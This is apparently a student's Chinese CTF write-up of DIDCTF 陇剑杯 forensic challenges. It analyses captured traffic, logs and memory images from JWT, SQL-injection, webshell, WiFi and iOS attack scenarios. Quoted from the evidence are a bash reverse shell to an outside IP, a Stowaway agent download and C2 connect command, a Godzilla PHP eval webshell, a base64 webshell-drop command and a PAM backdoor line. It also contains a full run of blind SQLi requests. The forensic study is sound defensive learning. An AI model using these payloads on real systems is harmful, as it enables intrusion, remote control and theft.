DIDCTF-陇剑杯
JWT-1 型
写之前了解一下什么是jwt
JSON Web Tokens (JWT) 详解
JWT(JSON Web Token)是一种开放标准(RFC 7519),用于在各方之间安全地传输信息作为JSON对象。
核心特点
-
紧凑性:JWT体积很小,可以通过URL、POST参数或HTTP头部发送
-
自包含性:包含关于用户的所有必要信息,避免多次查询数据库
-
安全性:使用数字签名(HMAC)或非对称加密(RSA/ECDSA)保证信息不被篡改
有三部分组成
头部(Header).载荷(Payload).签名(Signature)
在第一条流量包中
这是jwt特征
JWT-2型
如上图
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
eyJpZCI6MTAwODYsIk1hcENsYWltcyI6eyJhdWQiOiJhZG1pbiIsInVzZXJuYW1lIjoiYWRtaW4ifX0
dJArtwXjas3_Cg9a3tr8COXF7DRsuX8UjmbC1nKf8fc
分别是头部,负载,签名
eyJpZCI6MTAwODYsIk1hcENsYWltcyI6eyJhdWQiOiJhZG1pbiIsInVzZXJuYW1lIjoiYWRtaW4ifX0 Base64Url解码(不是base64)得到答案
10086#管理员
JWT-3型
黑客得到wenshell后执行whoami
但是回显是无权限,往下看POST请求流量包,
又执行了 whoami,回显root
这次的id是10087,成功执行命令
jwt-4
在POST请求流量包中往下看,黑客只在拿到root权限后执行了一系列命令,这里不一一说明,在tcp流19中执行了
mv%20/tmp/1.c%20/tmp/looter.c
将改名为已知后门文件名1.clooter.c
上传的文件是 1.c
jwt-5
在tcp流24中,执行了
command=echo%20"auth%20optional%20looter.so
黑客正在对系统的PAM安全模块目录进行侦查,确认后门文件已成功部署looter.so
所以答案是 looter.so
jwt-6
依旧往下看,在tcp流26找到答案,这黑客的手段太高明远超我的理解,所以借助ai一步一步分析
/etc/pam.d/common-auth
日志分析-1
要从日志中找源码文件需要
优先关注请求(源码文件通常通过 GET 直接下载);GET
状态码为(表示请求成功,文件被成功访问并泄漏);200 OK
www.zip
日志分析-2
直接搜tmp,然后找到答案
日志分析-3
然ai分析
SplFileObject
简单日志分析-1
大眼一看,就这个最长,攻击参数是user
简单日志分析-2
依旧找最长那个
Th4s_IS_VERY_Import_Fi1e
简单日志分析-3
最下面那一长串就是啊,需要解两次,交给ai就行,实际的攻击命令
bash -i >& /dev/tcp/192.168.2.197/8888 0>&1
192.168.2.198:8888
SQL注入-1
让ai分析一下
布尔盲注
SQL注入-2
这里看日志就行,
后面的攻击中包含数据库名,表名,字段名。
sqli#flag#flag
SQL注入-3
这个就是长度为43,这个是按位判断的,找每一位的最后一条,匹配成功了就会往下一位判断,找43条日志就行了,这可是大工程
下面是偷学长的文章内容😎
172.17.0.1 - - [01/Sep/2021:01:45:55 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),1,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),2,1) = 'l',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),3,1) = 'a',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),4,1) = 'g',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),5,1) = '{',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),6,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 482 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),7,1) = 'e',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 482 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),8,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:56 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),9,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 482 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:57 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),10,1) = 'c',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:57 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),11,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:57 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),12,1) = '6',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),13,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),14,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),15,1) = 'b',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),16,1) = 'c',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:58 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),17,1) = 'f',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),18,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),19,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:45:59 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),20,1) = '4',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:00 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),21,1) = '8',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:00 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),22,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:00 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),23,1) = 'e',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:01 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),24,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:01 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),25,1) = 'b',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:01 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),26,1) = '9',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:02 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),27,1) = '4',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:02 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),28,1) = '0',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:02 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),29,1) = '-',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:03 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),30,1) = '1',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:03 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),31,1) = '2',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:04 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),32,1) = '1',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:04 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),33,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:04 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),34,1) = 'e',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:04 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),35,1) = '6',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:05 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),36,1) = '6',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:05 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),37,1) = '8',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:05 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),38,1) = 'c',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 480 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),39,1) = '7',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 481 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),40,1) = 'd',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),41,1) = 'b',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),42,1) = '}',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 479 "-""python-requests/2.26.0"
172.17.0.1 - - [01/Sep/2021:01:46:06 0000] "GET /index.php?id=1 and if(substr((select flag from sqli.flag),43,1) = ' ',1,(select table_name from information_schema.tables)) HTTP/1.1" 200 478 "-""python-requests/2.26.0"
拼起来就是
flag{deddcd67-bcfd-487e-b940-1217e668c7db}(学长辛苦了)
WIFI-1
俺不中嘞,跟着学长文章复现了
这个cap文件也是流量包,也能用wireshark打开
看到ssid为My_wifi,这个ssid就相当于wifi的名字
然后看镜像文件,这里在kali用volatility分析。
python2 vol.py -f '/home/kali/Windows 7-dde00fa9.vmem' imageinfo
python2 vol.py -f '/home/kali/Windows 7-dde00fa9.vmem'--profile=Win7SP1x86_23418 filescan
这里列出了好多文件,一般有用的都是zip文件,txt文件,搜索一下
python2 vol.py -f '/home/kali/Windows 7-dde00fa9.vmem' --profile=Win7SP1x86_23418 filescan |grep -i "\.zip"
这里先导出这个压缩包
提示的意思是密码是网络适配器全局唯一标识符
网络适配器GUID是Windows 为每个网络接口(包括物理网卡、虚拟网卡、Wi-Fi 适配器等)分配一个唯一的 Interface GUID
由上文我们知道操作系统win7.关于系统保存的wifi密码文件地址:如果是Windows Vista或Windows 7,保存在c:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\[网卡Guid],每个无线网络对应一个XML文档。搜interfaces找到答案{529B7D2A-05D1-4F21-A001-8F4FF817FC3A}
然后解压看到xml文件
<WLANProfile>
<name>My_Wifi</name>
<SSIDConfig>
<SSID>
<hex>4D795F57696669</hex>
<name>My_Wifi</name>
</SSID>
</SSIDConfig>
<connectionType>ESS</connectionType>
<MSM>
<安全性>
<authEncryption>
<
<useOneX>false</useOneX>
</authEncryption >
<sharedKey>
<keyType>passPhrase</keyType>
<protected>false</protected>
<keyMaterial>233@114514_qwe</keyMaterial>
</sharedKey >
</安全性>
</MSM>
</WLANPro文件>密码是233@114514_qwe
接下来解释解密wifi数据包,这也是第一次见记录一下
这是wpa加密,解密需要密码和ssid,
上面已经知道了密码和ssid,
在wireshark中
编辑——首选项——IEEE802.11—Edit
然后添加数据
wpa-pwd:wpa key使用密码和SSID创建
MyPassword:MySSID
如图。
然后解密后找webshell流量,这个时候要看服务器的流量包,上传文件肯定是post,过滤看一下
上传地址是42.192.84.152,客户端过滤一下,其实过滤http请求行了。根据题目应该死哥斯拉流量,分析一下
url解码以下,在php跑一下
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if (isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if (stripos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}
}
这里让chatgpt分析代码后,就把加密数据依次发给他,在tcp流39得到答案
解密脚本偷学长的
<?php
//直接使用encode方法
function encode($D,$K){for($i=0;$i<strlen($D);$i++) {$c = $K[$i+1&15];$D[$i] = $D[$i]^$c;}return $D;
}
$key='3c6e0b8a9c15224a';
$key1="密文";
$str=substr($key1,16,-16);//原来的数据去掉前十六位和后十六位
$str=gzdecode(encode(base64_decode($str),$key));
echo $str;
?>flag{5db5b7b0bb74babb66e1522f3a6b1b12}
内存分析-1
问密码直接hashdump就行了,但是我用的解密网站没解出来,然后就用mimikatz插件了
这里记录一下如何安装这个mimikatz插件
https://github.com/volatilityfoundation/community/blob/master/FrancescoPicasso/mimikatz.py
把这个文件放到<volatility>/volatility/plugins/文件里,这里使用mv命令移动文件,具体命令因人而异这里不在多说。然后执行:
pip2 install --upgrade setuptools
pip2 install construct==2.5.5-reupload
虽然现在Python 2 本身依赖和 pip 仓库已大量失效。但是这个还能用,亲测有效
flag{W31C0M3 T0 THiS 34SY F0R3NSiCX}
内存分析-2
最开始我以为镜像文件里找备份文件,搜常见备份文件后缀的文件没有找到。然后搜.exe文件,发现
华为打钱,导出文件,后缀改为.exe文件。运行解压文件,让找到.enc文件,这是一个加密备份文件。根据提示密码应该与上一题的flag有关。看wp知道,密码就是把flag的空格换成下划线
W31C0M3_T0_THiS_34SY_F0R3NSiCX
解密这个文件要用kobackupdec.py脚本
python3 kobackupdec.py -vvv "W31C0M3_T0_THiS_34SY_F0R3NSiCX" "HUAWEI P40_2021-aa-bb xx.yy.zz/" "./"
flag{TH4NK Y0U FOR DECRYPTING MY DATA}
IOS-1
先了解一下C&C服务器
C&C 服务器即命令与控制服务器(Command and Control Server) ,在网络安全领域尤其是恶意软件、僵尸网络等场景中扮演着关键角色。
基本概念
恶意软件植入目标主机后,需要与攻击者进行通信以接收指令、回传数据。C&C 服务器就是攻击者远程操控被感染主机的中枢,它与受控主机建立通信连接,实现对受控主机的命令发送和状态监控,以及数据窃取等操作。
通信方式
- 基于 HTTP/HTTPS:使用常见的 Web 协议进行通信,能够很好地绕过防火墙等安全设备的检测。例如,恶意软件可以伪装成正常的 Web 请求向 C&C 服务器发送数据,或者接收来自服务器的指令。比如一些木马程序会定期以 GET 或 POST 请求的形式,将窃取到的用户信息(如登录凭证等)发送到 C&C 服务器。
- DNS 协议:将指令或数据隐藏在 DNS 请求和响应中。由于 DNS 是网络基础服务,大多数网络环境都会允许 DNS 流量通过。攻击者可以利用子域名来编码指令,受控主机通过解析特定的子域名获取指令,再通过 DNS 响应将执行结果返回给 C&C 服务器 。
- IRC(互联网中继聊天协议):早期僵尸网络常用的通信方式,攻击者通过搭建 IRC 服务器作为 C&C 服务器,被感染主机以 IRC 客户端的形式加入特定频道,接收攻击者在频道中发布的指令。
打开流量包先统计分析一下
3.128.156.159很可疑,一提交对了😎
在tcp流15里有答案,根据第二题,直接搜github,也能找到第一问答案
IOS-2
还是在那个包,黑客下载了Stowaway
wget https://github.com/ph4ntonn/Stowaway/releases/download/1.6.2/ios_agent && chmod 755 ios_agent
IOS-3
还是那个包,在下面有
./ios_agent -c 3.128.156.159:8081 -s hack4sec
密码是hack4sec
IOS-4
该流量包中存在部分tls加密流量
编辑-首选项-protocol-TLS,导入给的附件
解密后发现sql注入流量是http2协议,过滤看一下
找到盲注流量
通过盲注判断password字段的十六进制,通过分析流量攻击者通过爆破逐位判断每一个字符,每一位的最后一个流量就是正确的字符。
然后依次查找就行
查找正确的十六进制位
37 34 36 35 35 38 66 33 2D 63 38 34 31 2D 34 35 36 62 2D 38 35 64 37 2D 64 36 63 30 66 32 65 64 61 62 62 32(俺不中嘞,这里抄学长的😎)
746558f3-c841-456b-85d7-d6c0f2edabb2
IOS-5
这里又到知识盲区了。记录一下。
分析-专家信息-Connecction reset
看Seq=1 Ack=1 Win=0 Len=0的信息的端口,从10-499
IOS-6
由sql盲注流量可知,黑客攻击的ip是192.168.1.12,然后看日志。172.28.0.3 最多,一交不对然后看到172.28.0.2,upload.php 这个文件很熟悉是危险文件
IOS-7
秒了 fxkk
Webshell-1
直接搜login就行,在tcp流6号
Admin123!@#
Webshell-2
再往下看就行了
文件路径是data/Runtime/Logs/Home/21_08_07.log。问的是绝对路径,如图黑客执行了pwd命令,拼在一起就行了
/var/www/html/data/Runtime/Logs/Home/21_08_07.log
Webshell-3
依旧往下看,在tcp流28执行力whoami
www-data
Webshell-4
在tcp流33,
variable=1&tpl=data/Runtime/Logs/Home/21_08_07.log&aaa=system('echo PD9waHAgZXZhbCgkX1JFUVVFU1RbYWFhXSk7Pz4=|base64 -d > /var/www/html/1.php');
写入了1.php文件
Webshell-5
黑客上传文件后开始执行操作,扫了两次目录,第二次出现了可疑文件 frpc.ini文件,
frpc 是 FRP (Fast Reverse Proxy) 的客户端程序,用于内网穿透,允许你将本地服务(如 Web、SSH、RDP 等)暴露到公网。它通常配合 frps(FRP 服务端)一起使用。
同时在tcp流60,又扫目录,
出现了程序frpc
因此答案是frpc
Webshell-6
在tcp流59向服务器写入或更新内网穿透工具frp的客户端配置文件(frpc.ini) 的操作
代码太抽象让ai分析一下
192.168.239.123Webshell-7
如上图,账号密码
0HDFt16cLQJ#JTN276Gp